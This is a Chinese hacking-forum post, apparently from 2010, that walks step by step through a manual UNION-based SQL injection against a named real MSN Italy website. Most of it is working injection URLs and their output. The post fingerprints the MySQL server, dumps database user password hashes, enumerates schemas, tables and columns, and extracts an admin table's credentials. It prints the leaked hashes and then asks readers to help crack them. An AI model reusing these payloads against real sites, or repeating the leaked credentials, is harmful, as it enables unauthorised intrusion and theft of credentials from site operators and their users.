设为首页收藏本站

 找回密码
 注册
搜索
热搜: 回贴
微赢网络技术论坛 门户 站长交流 站长知道 查看内容

手动猜解网站库

2010-1-30 22:19| 发布者: admin| 查看: 15| 评论: 0|原作者: 天仙子

Gh0u1发了一个链接说 粗看是msn的网站,还以为有什么新的技术文章共享呢,一进去就不对啊~ 就看到1,2,3,4,5 这样的点数~看在url ,居然是一个注入点~ 被吓了下~,后来才是知道,他是在逛国外一个论坛的时候,一个网站上发出来的~ 好奇心来了,就看看,我记不记得这么玩这个~(最近失忆的很厉害),
首先 看到给的地址
http://benessere.it.msn.com/gallery/-1 union select 1,2,3,4,5,6,7,8,9,10,11--/casalinghe-perfette-10-m osse-.html
网页出现了1,2,9,10,11 好~~可以开始使用语句来 首先 看看他的数据库是什么类型的~ 我首先尝试mysql的 我将2 处替换成了 concat_ws(0x3a,user(),@@version,database()) 接着完整的语句是
http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,user(),@@version,database()),3,4,5,6,7,8,9,10,11--/casalinghe-perfette-10-m osse-.html
我们就知道他的数据库版本 使用的用户 数据库的名字 mysql@localhost:5.0.22:progr
居然出现了~是mysql的哦 还是5.0.22的~ 接着 跨库看看~ 语句是
http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,User,Password,Host),3,4,5,6,7,8,9,10,11+from+mysql.user--/casalinghe-perfette-10-m osse-.html
接着看到可人的消息
root:7687543e5d021f1c:localhost
会不会有其他的用户呢? 接着我就用limit 来试下
http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,User,Password,Host),3,4,5,6,7,8,9,10,11+from+mysql.user+limit,1,30--/casalinghe-perfette-10-m osse-.html
呃~居然有唉
root:7687543e5d021f1c:donna.sanihelp.it 依次测试的掉完全的用户如下
root:7687543e5d021f1c:localhost
root:7687543e5d021f1c:donna.sanihelp.it
donnamsn:1558b7da73ad0249:%
mysql:659764293f6714cc:localhost
concorsi:7b1df5aa33eb7d2c:localhost
可惜没有一个可以破的`~(微软不是吃素的~安全密码总要个吧 ~)
无果~
然后用同样的方法 查阅了 information_schema.schema 知道了他有哪些库
http://benessere.it.msn.com/gallery/-1 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11+from+information_schema.SCHEMATA+limit+22,30--/casalinghe-perfette-10-m osse-.html
12allnew
SLAVEFILE
Test
alimenti
concorsi
contatti
contenuti
dieta_on_line
drAnswer
farmaci
gallery
lavoro
mailinglist
mysql
newsletter_msn
nomi
progr
quiz
sondaggi
strutture
terme
viaggi
........(不想读了~仅供学习而已)
知道库里读表名 information_schema.Tables
http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,TABLES_NAME,TABLE_SCHEMA),3,4,5,6,7,8,9,10,11+from+information_schema.Tables+limit+1,30--/casalinghe-perfette-10-m osse-.html
我用where 居然出问题~ (请大牛给予修正~我用笨办法)
接着我们知道了表的名字 做记录~~然后找写关键的
接着是COLUMNS 是这个表~知道表的字段名 方法问题如上所述~自己变通下 ~
http://benessere.it.msn.com/gallery/-1 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10,11+from+information_schema.COLUMNS+where+TABLE_NAME=char(49,50,97,108,108,95,97,100,109,105,110,95,98,95,108,111,103)+limit+1,30--/casalinghe-perfette-10-m osse-.html
we know
id
user
pass

then~
http://benessere.it.msn.com/gallery/-1 union select 1,concat_ws(0x3a,user,pass),3,4,5,6,7,8,9,10,11+from+12allnew.12all_admin_b_log+limit+8,30--/casalinghe-perfette-10-m osse-.html
ok!~ we know the username and password but i don't know how to crack it ~
who can help me ~to crack it~
that's all
thank all of you

收藏 分享 邀请

最新评论

相关分类

QQ|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )

GMT+8, 2024-10-1 05:37 , Processed in 0.143216 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

返回顶部